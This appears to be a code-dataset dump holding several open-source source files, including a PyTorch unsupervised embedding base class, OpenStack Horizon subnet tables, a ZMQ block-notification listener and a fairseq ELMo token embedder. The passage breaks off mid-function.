2021-12-20T06:24:27.000Z
|
galileo/framework/pytorch/python/unsupervised.py
|
Hacky-DH/galileo
|
e4d5021f0287dc879730dfa287b9a056f152f712
|
[
"Apache-2.0"
] | 28
|
2021-09-10T08:47:20.000Z
|
2022-03-17T07:29:26.000Z
|
# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from collections import OrderedDict
import torch
from torch.nn import Module
from galileo.framework.python.base_unsupervised import BaseUnsupervised
from galileo.platform.export import export
from galileo.framework.pytorch.python.metrics import get_metric
from galileo.framework.pytorch.python.losses import get_loss
@export('galileo.pytorch')
class Unsupervised(Module, BaseUnsupervised):
r'''
\brief unsupervised network embedding model
compute the loss and metrics
Methods that the subclass must implement:\n
target_encoder,
context_encoder,
'''
def __init__(self,
loss_name='neg_cross_entropy',
metric_names='mrr',
*args,
**kwargs):
Module.__init__(self)
BaseUnsupervised.__init__(self, *args, **kwargs)
self.loss_name = loss_name
if isinstance(metric_names, str):
metric_names = [metric_names]
self.metric_names = metric_names
def target_encoder(self, inputs):
raise NotImplementedError('call abc method')
def context_encoder(self, inputs):
raise NotImplementedError('call abc method')
def compute_logits(self, target, context):
return torch.sum(target * context, dim=-1)
def loss_and_metrics(self, logits, negative_logits):
r'''
\return a dict of loss and metrics
'''
outputs = OrderedDict(
loss=get_loss(self.loss_name)(logits, negative_logits))
for metric_name in self.metric_names:
outputs[metric_name] = get_metric(metric_name)(logits,
negative_logits)
return outputs
def convert_ids_tensor(self, inputs):
if isinstance(inputs, (list, tuple)):
return torch.tensor(inputs, dtype=torch.int64)
if torch.is_tensor(inputs) and inputs.dtype != torch.int64:
return inputs.to(dtype=torch.int64)
return inputs
def convert_features_tensor(self, inputs):
return self.convert_ids_tensor(inputs)
def forward(self, inputs):
return BaseUnsupervised.__call__(self, inputs)
| 36.0125
| 80
| 0.660535
|
from collections import OrderedDict
import torch
from torch.nn import Module
from galileo.framework.python.base_unsupervised import BaseUnsupervised
from galileo.platform.export import export
from galileo.framework.pytorch.python.metrics import get_metric
from galileo.framework.pytorch.python.losses import get_loss
@export('galileo.pytorch')
class Unsupervised(Module, BaseUnsupervised):
def __init__(self,
loss_name='neg_cross_entropy',
metric_names='mrr',
*args,
**kwargs):
Module.__init__(self)
BaseUnsupervised.__init__(self, *args, **kwargs)
self.loss_name = loss_name
if isinstance(metric_names, str):
metric_names = [metric_names]
self.metric_names = metric_names
def target_encoder(self, inputs):
raise NotImplementedError('call abc method')
def context_encoder(self, inputs):
raise NotImplementedError('call abc method')
def compute_logits(self, target, context):
return torch.sum(target * context, dim=-1)
def loss_and_metrics(self, logits, negative_logits):
outputs = OrderedDict(
loss=get_loss(self.loss_name)(logits, negative_logits))
for metric_name in self.metric_names:
outputs[metric_name] = get_metric(metric_name)(logits,
negative_logits)
return outputs
def convert_ids_tensor(self, inputs):
if isinstance(inputs, (list, tuple)):
return torch.tensor(inputs, dtype=torch.int64)
if torch.is_tensor(inputs) and inputs.dtype != torch.int64:
return inputs.to(dtype=torch.int64)
return inputs
def convert_features_tensor(self, inputs):
return self.convert_ids_tensor(inputs)
def forward(self, inputs):
return BaseUnsupervised.__call__(self, inputs)
| true
| true
|
1c49046e7409be20302d3973b96a35a62ee3e76a
| 150
|
py
|
Python
|
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
school/simpleApi/apps.py
|
kiarashplusplus/PaperPileSchool
|
40f91eea15d743bd22f918cec42e9c778b3d6d7d
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class SimpleapiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'simpleApi'
| 21.428571
| 56
| 0.766667
|
from django.apps import AppConfig
class SimpleapiConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'simpleApi'
| true
| true
|
1c49062476515aed231866528eec2b58762011d2
| 4,570
|
py
|
Python
|
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
openstack_dashboard/dashboards/project/networks/subnets/tables.py
|
aristanetworks/horizon
|
6b4ba5194d46360bf1a436b6f9531facfbf5084a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class CheckNetworkEditable(object):
"""Mixin class to determine the specified network is editable."""
def allowed(self, request, datum=None):
# Only administrator is allowed to create and manage subnets
# on shared networks.
network = self.table._get_network()
if network.shared:
return False
return True
class DeleteSubnet(CheckNetworkEditable, tables.DeleteAction):
data_type_singular = _("Subnet")
data_type_plural = _("Subnets")
policy_rules = (("network", "delete_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def delete(self, request, obj_id):
try:
api.neutron.subnet_delete(request, obj_id)
except Exception:
msg = _('Failed to delete subnet %s') % obj_id
LOG.info(msg)
network_id = self.table.kwargs['network_id']
redirect = reverse('horizon:project:networks:detail',
args=[network_id])
exceptions.handle(request, msg, redirect=redirect)
class CreateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "create"
verbose_name = _("Create Subnet")
url = "horizon:project:networks:addsubnet"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
network = self.table._get_network()
if network:
project_id = getattr(network, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, datum=None):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id,))
class UpdateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "update"
verbose_name = _("Edit Subnet")
url = "horizon:project:networks:editsubnet"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, subnet):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id, subnet.id))
class SubnetsTable(tables.DataTable):
name = tables.Column("name", verbose_name=_("Name"),
link='horizon:project:networks:subnets:detail')
cidr = tables.Column("cidr", verbose_name=_("Network Address"))
ip_version = tables.Column("ipver_str", verbose_name=_("IP Version"))
gateway_ip = tables.Column("gateway_ip", verbose_name=_("Gateway IP"))
failure_url = reverse_lazy('horizon:project:networks:index')
@memoized.memoized_method
def _get_network(self):
try:
network_id = self.kwargs['network_id']
network = api.neutron.network_get(self.request, network_id)
network.set_id_as_name_if_empty(length=0)
except Exception:
msg = _('Unable to retrieve details for network "%s".') \
% (network_id)
exceptions.handle(self.request, msg, redirect=self.failure_url)
return network
class Meta:
name = "subnets"
verbose_name = _("Subnets")
table_actions = (CreateSubnet, DeleteSubnet)
row_actions = (UpdateSubnet, DeleteSubnet)
| 35.153846
| 78
| 0.66674
|
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import tables
from horizon.utils import memoized
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class CheckNetworkEditable(object):
def allowed(self, request, datum=None):
network = self.table._get_network()
if network.shared:
return False
return True
class DeleteSubnet(CheckNetworkEditable, tables.DeleteAction):
data_type_singular = _("Subnet")
data_type_plural = _("Subnets")
policy_rules = (("network", "delete_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def delete(self, request, obj_id):
try:
api.neutron.subnet_delete(request, obj_id)
except Exception:
msg = _('Failed to delete subnet %s') % obj_id
LOG.info(msg)
network_id = self.table.kwargs['network_id']
redirect = reverse('horizon:project:networks:detail',
args=[network_id])
exceptions.handle(request, msg, redirect=redirect)
class CreateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "create"
verbose_name = _("Create Subnet")
url = "horizon:project:networks:addsubnet"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (("network", "create_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
network = self.table._get_network()
if network:
project_id = getattr(network, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, datum=None):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id,))
class UpdateSubnet(CheckNetworkEditable, tables.LinkAction):
name = "update"
verbose_name = _("Edit Subnet")
url = "horizon:project:networks:editsubnet"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("network", "update_subnet"),)
def get_policy_target(self, request, datum=None):
project_id = None
if datum:
project_id = getattr(datum, 'tenant_id', None)
return {"network:project_id": project_id}
def get_link_url(self, subnet):
network_id = self.table.kwargs['network_id']
return reverse(self.url, args=(network_id, subnet.id))
class SubnetsTable(tables.DataTable):
name = tables.Column("name", verbose_name=_("Name"),
link='horizon:project:networks:subnets:detail')
cidr = tables.Column("cidr", verbose_name=_("Network Address"))
ip_version = tables.Column("ipver_str", verbose_name=_("IP Version"))
gateway_ip = tables.Column("gateway_ip", verbose_name=_("Gateway IP"))
failure_url = reverse_lazy('horizon:project:networks:index')
@memoized.memoized_method
def _get_network(self):
try:
network_id = self.kwargs['network_id']
network = api.neutron.network_get(self.request, network_id)
network.set_id_as_name_if_empty(length=0)
except Exception:
msg = _('Unable to retrieve details for network "%s".') \
% (network_id)
exceptions.handle(self.request, msg, redirect=self.failure_url)
return network
class Meta:
name = "subnets"
verbose_name = _("Subnets")
table_actions = (CreateSubnet, DeleteSubnet)
row_actions = (UpdateSubnet, DeleteSubnet)
| true
| true
|
1c4906852776569e2ce7369dcfd53d2a135ae29a
| 3,279
|
py
|
Python
|
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
contrib/zmq/zmq_sub3.4.py
|
planbcoin/planbcoin
|
7d132eebdce94f34ca2e74278b5ca09dc012d164
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The PlanBcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Planbcoin should be started with the command line arguments:
planbcoind -testnet -daemon \
-zmqpubhashblock=tcp://127.0.0.1:29067 \
-zmqpubrawtx=tcp://127.0.0.1:29067 \
-zmqpubhashtx=tcp://127.0.0.1:29067 \
-zmqpubhashblock=tcp://127.0.0.1:29067
We use the asyncio library here. `self.handle()` installs itself as a
future at the end of the function. Since it never returns with the event
loop having an empty stack of futures, this creates an infinite loop. An
alternative is to wrap the contents of `handle` inside `while True`.
The `@asyncio.coroutine` decorator and the `yield from` syntax found here
was introduced in python 3.4 and has been deprecated in favor of the `async`
and `await` keywords respectively.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/planbcoin/planbcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 4):
print("This example only works with Python 3.4 and greater")
exit(1)
port = 29067
class ZMQHandler():
def __init__(self):
self.loop = zmq.asyncio.install()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
@asyncio.coroutine
def handle(self) :
msg = yield from self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"hashtx":
print('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
| 36.433333
| 111
| 0.649588
|
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if not (sys.version_info.major >= 3 and sys.version_info.minor >= 4):
print("This example only works with Python 3.4 and greater")
exit(1)
port = 29067
class ZMQHandler():
def __init__(self):
self.loop = zmq.asyncio.install()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
@asyncio.coroutine
def handle(self) :
msg = yield from self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"hashtx":
print('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body))
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
| true
| true
|
1c490765321bf0d9ddbb802fbb128e59f4873dde
| 12,666
|
py
|
Python
|
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/modules/fb_elmo_token_embedder.py
|
xwhan/fairseq-wklm
|
9c7c927fca75cd2b08c0207ff7f7682ed95a98e0
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
from typing import Dict, List
import torch
from torch import nn
from fairseq.models import FairseqLanguageModel
from fairseq.utils import buffered_arange
class ElmoTokenEmbedder(nn.Module):
"""
This is an implementation of the ELMo module which allows learning how to combine hidden states of a language model
to learn task-specific word representations.
For more information see the paper here: http://arxiv.org/abs/1802.05365
This implementation was inspired by the implementation in AllenNLP found here:
https://github.com/allenai/allennlp/blob/master/tutorials/how_to/elmo.md
"""
def __init__(
self,
language_model: FairseqLanguageModel,
eos: int,
pad: int,
tune_lm: bool = False,
lm_frozen_layers: int = 0,
lm_tune_embedding: bool = False,
weights_dropout: float = 0.,
final_dropout: float = 0.,
layer_norm: bool = True,
affine_layer_norm: bool = False,
projection_dim: int = None,
apply_softmax: bool = True,
combine_tower_states: bool = True,
add_final_predictive: bool = True,
add_final_context: bool = True,
add_bos: bool = False,
add_eos: bool = False,
remove_bos: bool = False,
remove_eos: bool = False,
char_inputs: bool = False,
max_char_len: int = 50,
use_boundary_tokens: bool = False,
):
super().__init__()
self.onnx_trace = False
self.language_model = language_model
self.eos_idx = eos
self.padding_idx = pad
self.tune_lm = tune_lm
self.combine_tower_states = combine_tower_states
self.add_final_predictive = add_final_predictive
self.add_final_context = add_final_context
self.add_bos = add_bos
self.add_eos = add_eos
self.remove_bos = remove_bos
self.remove_eos = remove_eos
self.char_inputs = char_inputs
# use_boundary_tokens will only use the bos/eos of the ELMO last layer,
# will override some other options in _lm_states and forward,
# for the purpose of fine-tuning the language model
self.use_boundary_tokens = use_boundary_tokens
if self.use_boundary_tokens:
# make sure the bos and eos are not remove in fine tuning case
assert (not self.remove_bos)
assert (not self.remove_eos)
self.num_layers = len(language_model.decoder.forward_layers)
if self.add_final_context:
self.num_layers += 1
if not self.combine_tower_states:
self.num_layers *= 2
# +1 for token embedding layer
self.num_layers += 1
if language_model.decoder.self_target and self.add_final_predictive:
self.num_layers += 1
self.dim = language_model.decoder.embed_dim
if not self.use_boundary_tokens and self.combine_tower_states:
self.dim *= 2
self.embedding_dim = projection_dim or self.dim
self.weights_dropout = nn.Dropout(weights_dropout)
self.final_dropout = nn.Dropout(final_dropout)
self.layer_norm = nn.LayerNorm(self.dim, elementwise_affine=affine_layer_norm) if layer_norm else None
if self.use_boundary_tokens:
self.weights = None
self.gamma = None
else:
self.weights = nn.Parameter(torch.ones(self.num_layers))
self.gamma = nn.Parameter(torch.ones(1))
self.softmax = nn.Softmax(dim=0) if apply_softmax else None
self.projection = nn.Linear(self.dim, projection_dim,
bias=False) if projection_dim is not None and projection_dim != self.dim else None
trainable_params, non_trainable_params = self._get_params_by_trainability(
lm_frozen_layers, lm_tune_embedding
)
self.trainable_params_by_layer: List[Dict[str, nn.Parameter]] = trainable_params
for p in non_trainable_params:
p.requires_grad = False
if not tune_lm:
language_model.eval()
def _get_params_by_trainability(self, lm_frozen_layers, lm_tune_embedding):
non_lm_params = self._non_lm_parameters()
if not self.tune_lm:
# Only non-lm parameters are trainable
return [non_lm_params], self.language_model.parameters()
if not hasattr(self.language_model, "get_layers_by_depth_for_fine_tuning"):
assert lm_frozen_layers == 0
# All params are trainable
return [dict(self.named_parameters())], []
lm_params_by_layer = self._lm_parameters_by_layer()
assert len(lm_params_by_layer) >= lm_frozen_layers + 1 # +1 for embedding
trainable_lm_params = []
non_trainable_lm_params = []
if lm_tune_embedding:
trainable_lm_params.append(lm_params_by_layer[0])
else:
non_trainable_lm_params.append(lm_params_by_layer[0])
trainable_lm_params.extend(lm_params_by_layer[lm_frozen_layers + 1:])
non_trainable_lm_params.extend(lm_params_by_layer[1: lm_frozen_layers + 1])
trainable_params = trainable_lm_params + [non_lm_params]
non_trainable_params = [
p for param_dict in non_trainable_lm_params for p in param_dict.values()
]
return trainable_params, non_trainable_params
def _non_lm_parameters(self):
non_lm_parameters = dict(self.named_parameters())
for name, _ in self.language_model.named_parameters():
del non_lm_parameters["language_model.%s" % name]
return non_lm_parameters
def _lm_parameters_by_layer(self):
lm_layers = self.language_model.get_layers_by_depth_for_fine_tuning()
return [
{
"language_model.%s.%s" % (module_name, param_name): param
for module_name, module in lm_layer.items()
for param_name, param in module.named_parameters()
}
for lm_layer in lm_layers
]
def prepare_for_onnx_export_(self):
self.onnx_trace = True
def reset_parameters(self):
if self.projection:
nn.init.xavier_normal_(self.projection.weight)
if self.softmax is None:
nn.init.constant_(self.weights, 1 / (self.num_layers * 2))
def _lm_states(self, input: torch.Tensor, eos_idx_mask=None):
"""apply the language model on the input and get internal states
Args:
input: the sentence tensor
eos_idx_mask: the mask for the index of eos for each sentence
Returns:
return a list of states from the language model,
if use_boundary_tokens, only return the last layer
if combine_tower_states, will combine forward and backward
"""
if self.tune_lm:
x, model_out = self.language_model(input, src_lengths=None)
else:
with torch.no_grad():
x, model_out = self.language_model(input, src_lengths=None)
if self.use_boundary_tokens:
bos_state = x[:, 0, :]
if eos_idx_mask is None:
return [bos_state.unsqueeze(1)]
eos_state = x[eos_idx_mask] # batch_size * embeding_size
return [torch.cat((bos_state.unsqueeze(1), eos_state.unsqueeze(1)), dim=1)]
assert 'inner_states' in model_out
# TBC -> BTC
states = [s.transpose(0, 1) for s in model_out['inner_states']]
has_final_predictive = len(states) % 2 == 0
if self.add_final_context:
zeros = states[-1].new_zeros(states[-1].size(0), 1, states[-1].size(2))
if states[-1].size(1) == 1:
s1 = s2 = zeros
else:
s1 = torch.cat([zeros, states[-1][:, :-1, :]], dim=1)
s2 = torch.cat([states[-1][:, 1:, :], zeros], dim=1)
if has_final_predictive:
states.insert(-1, s1)
states.insert(-1, s2)
else:
states.extend([s1, s2])
if self.combine_tower_states:
new_states = [torch.cat([states[0], states[0]], dim=-1)]
start = 1 # first element is the token embeddings
end = len(states)
if has_final_predictive:
end -= 1
for i in range(start, end, 2):
new_states.append(torch.cat([states[i], states[i + 1]], dim=-1))
if self.add_final_predictive and has_final_predictive:
new_states.append(torch.cat([states[-1], states[-1]], dim=-1))
states = new_states
elif not self.add_final_predictive and has_final_predictive:
states = states[:-1]
return states
def _with_sentence_boundaries(
self,
input: torch.Tensor):
"""
Args:
input: the sentence Tensor
it's bs * seq_len * num_chars in case of char input and bs*seq_len in case of token input
Returns:
tuple,
1) processed input,
2) tensor mask for the eos position of each sentence,
None if did not add eos
"""
if not self.add_bos and not self.add_eos:
return input, None
zero_block = input.new(0, 0)
block_size = (input.size(0), 1, input.size(2)) if self.char_inputs else (input.size(0), 1)
bos_block = torch.full(block_size, self.eos_idx).type_as(input) if self.add_bos else zero_block
pad_block = torch.full(block_size, self.padding_idx).type_as(input) if self.add_eos else zero_block
# add eos in the beginning and pad to the end of the sentence
input = torch.cat([bos_block, input, pad_block], dim=1)
first_pads = None # if not add_eos, then first_pads is not valid, set to None
if self.add_eos:
index_block = input[:, :, 0] if self.char_inputs else input
padding_mask = index_block.eq(self.padding_idx)
num_pads = padding_mask.long().sum(dim=1, keepdim=True)
max_len = input.size(1)
# index of the first pad
if self.onnx_trace:
first_pads = torch._dim_arange(input, 1).type_as(input).view(1, -1).\
repeat(input.size(0), 1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).repeat(1, 1, input.size(-1))
input = torch.where(eos_indices, torch.Tensor([self.eos_idx]).type_as(input), input)
else:
first_pads = buffered_arange(max_len).type_as(input).view(1, -1).\
expand(input.size(0), -1).eq(max_len - num_pads)
eos_indices = first_pads
if self.char_inputs:
eos_indices = eos_indices.unsqueeze(2).expand_as(input)
input[eos_indices] = self.eos_idx
return input, first_pads
def _without_sentence_boundaries(
self,
input: torch.Tensor,
):
if self.remove_bos:
# remove first token (beginning eos)
input = input[:, 1:]
if self.remove_eos:
# just remove last one to match size since downstream task
# needs to deal with padding value
input = input[:, :-1]
return input
def forward(
self,
input: torch.Tensor,
):
input, eos_idx_mask = self._with_sentence_boundaries(input)
states = self._lm_states(input, eos_idx_mask)
if self.use_boundary_tokens:
return states[0] # only have one element and return it
if self.layer_norm is not None:
states = [self.layer_norm(s) for s in states]
if self.softmax is not None:
w = self.softmax(self.weights)
else:
w = self.weights
w = self.weights_dropout(w)
x = states[0].new_zeros(input.size()[:2] + (self.dim,))
for i in range(len(states)):
x += states[i] * w[i]
x = self._without_sentence_boundaries(x)
if self.projection is not None:
x = self.projection(x)
x = self.gamma * x
x = self.final_dropout(x)
return x
| 37.362832
| 119
| 0.614085
|
from typing import Dict, List
import torch
from torch import nn
from fairseq.models import FairseqLanguageModel
from fairseq.utils import buffered_arange
class ElmoTokenEmbedder(nn.Module):
def __init__(
self,
language_model: FairseqLanguageModel,
eos: int,
pad: int,
tune_lm: bool = False,
lm_frozen_layers: int = 0,
lm_tune_embedding: bool = False,
weights_dropout: float = 0.,
final_dropout: float = 0.,
layer_norm: bool = True,
affine_layer_norm: bool = False,
projection_dim: int = None,
apply_softmax: bool = True,
combine_tower_states: bool = True,
add_final_predictive: bool = True,
add_final_context: bool = True,
add_bos: bool = False,
add_eos: bool = False,
remove_bos: bool = False,
remove_eos: bool = False,
char_inputs: bool = False,
max_char_len: int = 50,
use_boundary_tokens: bool = False,
):
super().__init__()
self.onnx_trace = False
self.language_model = language_model
self.eos_idx = eos
self.padding_idx = pad
self.tune_lm = tune_lm
self.combine_tower_states = combine_tower_states
self.add_final_predictive = add_final_predictive
self.add_final_context = add_final_context
self.add_bos = add_bos
self.add_eos = add_eos
self.remove_bos = remove_bos
self.remove_eos = remove_eos
self.char_inputs = char_inputs
self.use_boundary_tokens = use_boundary_tokens
if self.use_boundary_tokens:
assert (not self.remove_bos)
assert (not self.remove_eos)
self.num_layers = len(language_model.decoder.forward_layers)
if self.add_final_context:
self.num_layers += 1
if not self.combine_tower_states:
self.num_layers *= 2
self.num_layers += 1
if language_model.decoder.self_target and self.add_final_predictive:
self.num_layers += 1
self.dim = language_model.decoder.embed_dim
if not self.use_boundary_tokens and self.combine_tower_states:
self.dim *= 2
self.embedding_dim = projection_dim or self.dim
self.weights_dropout = nn.Dropout(weights_dropout)
self.final_dropout = nn.Dropout(final_dropout)
self.layer_norm = nn.LayerNorm(self.dim, elementwise_affine=affine_layer_norm) if layer_norm else None
if self.use_boundary_tokens:
self.weights = None
self.gamma = None
else:
self.weights = nn.Parameter(torch.ones(self.num_layers))
self.gamma = nn.Parameter(torch.ones(1))
self.softmax = nn.Softmax(dim=0) if apply_softmax else None
self.projection = nn.Linear(self.dim, projection_dim,
bias=False) if projection_dim is not None and projection_dim != self.dim else None
trainable_params, non_trainable_params = self._get_params_by_trainability(
lm_frozen_layers, lm_tune_embedding
)
self.trainable_params_by_layer: List[Dict[str, nn.Parameter]] = trainable_params
for p in non_trainable_params:
p.requires_grad = False
if not tune_lm:
language_model.eval()
def _get_params_by_trainability(self, lm_frozen_layers, lm_tune_embedding):
non_lm_params = self._non_lm_parameters()
if not self.tune_lm:
return [non_lm_params], self.language_model.parameters()
if not hasattr(self.language_model, "get_layers_by_depth_for_fine_tuning"):
assert lm_frozen_layers == 0
return [dict(self.named_parameters())], []
lm_params_by_layer = self._lm_parameters_by_layer()
assert len(lm_params_by_layer) >= lm_frozen_layers + 1
trainable_lm_params = []
non_trainable_lm_params = []
if lm_tune_embedding:
trainable_lm_params.append(lm_params_by_layer[0])
else:
non_trainable_lm_params.append(lm_params_by_layer[0])
trainable_lm_params.extend(lm_params_by_layer[lm_frozen_layers + 1:])
non_trainable_lm_params.extend(lm_params_by_layer[1: lm_frozen_layers + 1])
trainable_params = trainable_lm_params + [non_lm_params]
non_trainable_params = [
p for param_dict in non_trainable_lm_params for p in param_dict.values()
]
return trainable_params, non_trainable_params
def _non_lm_parameters(self):
non_lm_parameters = dict(self.named_parameters())
for name, _ in self.language_model.named_parameters():
del non_lm_parameters["language_model.%s" % name]
return non_lm_parameters
def _lm_parameters_by_layer(self):
lm_layers = self.language_model.get_layers_by_depth_for_fine_tuning()
return [
{
"language_model.%s.%s" % (module_name, param_name): param
for module_name, module in lm_layer.items()
for param_name, param in module.named_parameters()
}
for lm_layer in lm_layers
]
def prepare_for_onnx_export_(self):
self.onnx_trace = True
def reset_parameters(self):
if self.projection:
nn.init.xavier_normal_(self.projection.weight)
if self.softmax is None:
nn.init.constant_(self.weights, 1 / (self.num_layers * 2))
def _lm_states(self, input: torch.Tensor, eos_idx_mask=None):
if self.tune_lm:
x, model_out = self.language_model(input, src_lengths=None)
else:
with torch.no_grad():
x, model_out = self.language_model(input, src_lengths=None)
if self.use_boundary_tokens:
bos_state = x[:, 0, :]
if eos_idx_mask is None:
return [bos_state.unsqueeze(1)]
eos_state = x[eos_idx_mask] return [torch.cat((bos_state.unsqueeze(1), eos_state.unsqueeze(1)), dim=1)]
assert 'inner_states' in model_out
states = [s.transpose(0, 1) for s in model_out['inner_states']]
has_final_predictive = len(states) % 2 == 0
if self.add_final_context:
zeros = states[-1].new_zeros(states[-1].size(0), 1, states[-1].size(2))
if states[-1].size(1) == 1:
